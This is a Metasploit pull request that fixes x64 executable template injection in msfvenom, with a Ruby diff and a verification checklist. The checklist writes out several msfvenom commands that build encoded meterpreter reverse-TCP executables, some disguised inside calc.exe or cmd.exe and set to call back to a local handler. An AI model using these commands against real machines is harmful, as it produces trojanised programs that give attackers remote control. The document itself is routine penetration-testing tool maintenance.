### PR TITLE
Fix x64 exe injection

### DIFF
--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -15,10 +15,16 @@ module Exe
       @payload = opts[:payload]
       @template = opts[:template]
       @arch  = opts[:arch] || :x86
-      @buffer_register = opts[:buffer_register] || 'edx'
+      @buffer_register = opts[:buffer_register]
 
       x86_regs = %w{eax ecx edx ebx edi esi}
       x64_regs = %w{rax rcx rdx rbx rdi rsi} + (8..15).map{|n| "r#{n}" }
+
+      @buffer_register ||= if @arch == :x86
+                             "edx"
+                           else
+                             "rdx"
+                           end
 
       if @arch == :x86 && !x86_regs.include?(@buffer_register.downcase)
         raise ArgumentError, ":buffer_register is not a real register"

--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -16,7 +16,13 @@ module Exe
       @template = opts[:template]
       @arch  = opts[:arch] || :x86
       @buffer_register = opts[:buffer_register] || 'edx'
-      unless %w{eax ecx edx ebx edi esi}.include?(@buffer_register.downcase)
+
+      x86_regs = %w{eax ecx edx ebx edi esi}
+      x64_regs = %w{rax rcx rdx rbx rdi rsi} + (8..15).map{|n| "r#{n}" }
+
+      if @arch == :x86 && !x86_regs.include?(@buffer_register.downcase)
+        raise ArgumentError, ":buffer_register is not a real register"
+      elsif @arch == :x64 && !x64_regs.include?(@buffer_register.downcase)
         raise ArgumentError, ":buffer_register is not a real register"
       end
     end

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -641,7 +641,7 @@ require 'msf/core/exe/segment_appender'
     opts[:exe_type] = :dll
 
     if opts[:inject]
-      self.to_win64pe(framework, code, opts)
+      raise RuntimeError, 'Template injection unsupported for x64 DLLs'
     else
       exe_sub_method(code,opts)
     end

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -641,7 +641,7 @@ require 'msf/core/exe/segment_appender'
     opts[:exe_type] = :dll
 
     if opts[:inject]
-      raise RuntimeError, 'Template injection unsupported for x64 DLLs'
+      self.to_win64pe(framework, code, opts)
     else
       exe_sub_method(code,opts)
     end

--- a/msfvenom
+++ b/msfvenom
@@ -284,7 +284,7 @@ if __FILE__ == $0
     generator_opts = parse_args(ARGV)
   rescue MsfVenomError, Msf::OptionValidateError => e
     $stderr.puts "Error: #{e.message}"
-    exit(-1)
+    exit(1)
   end
 
   if generator_opts[:list]
@@ -348,7 +348,7 @@ if __FILE__ == $0
   end
 
   # No payload generated, no point to go on
-  exit(-1) unless payload
+  exit(2) unless payload
 
   if generator_opts[:out]
     begin


### PR DESCRIPTION
Reported here: https://community.rapid7.com/thread/7655

When creating an x64 exe we were inserting a 32-bit stub to call `CreateThread` which obviously won't work.
## Verification
- [ ] 32-bit 
  - [x] get a 32-bit exe from Windows 7 (I used calc.exe)
  - [x] still works with default template
    - [x] `./msfvenom LHOST=192.168.99.1 LPORT=9999 -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 5 > met-9999.exe`
  - [x] still works with a different template
    - [x] `./msfvenom LHOST=192.168.99.1 LPORT=9999 -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 5 -x calc.exe > met-inject-9999.exe`
  - [x] thread injection (`-k`) still works
    - [x] `./msfvenom LHOST=192.168.99.1 LPORT=9999 -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 5 -x calc.exe -k > met-inject-keep-9999.exe`
  - [x] set up a handler
  - [x] copy all of those exes back to win7, run them
  - [x] **VERIFY** sessions for all
- [ ] 64-bit works after this pull request
  - [ ] get a 64-bit exe from Windows 7 (I used cmd.exe)
  - [x] works with default template
    - [x] `./msfvenom LHOST=192.168.99.1 LPORT=6464 -p windows/x64/meterpreter/reverse_tcp -f exe -e x64/xor -i 5 > met-6464.exe`
  - [x] works with a different template
    - [x] `./msfvenom LHOST=192.168.99.1 LPORT=6464 -p windows/x64/meterpreter/reverse_tcp -f exe -e x64/xor -i 5 -x cmd.exe > met-inject-6464.exe`
  - [ ] thread injection (`-k`) works
    - [ ] `./msfvenom LHOST=192.168.99.1 LPORT=6464 -p windows/x64/meterpreter/reverse_tcp -f exe -e x64/xor -i 5 -x cmd.exe -k > met-inject-keep-6464.exe`
  - [x] set up a handler
  - [x] copy all of those .exes back to win7, run them
  - [ ] **VERIFY** sessions for all
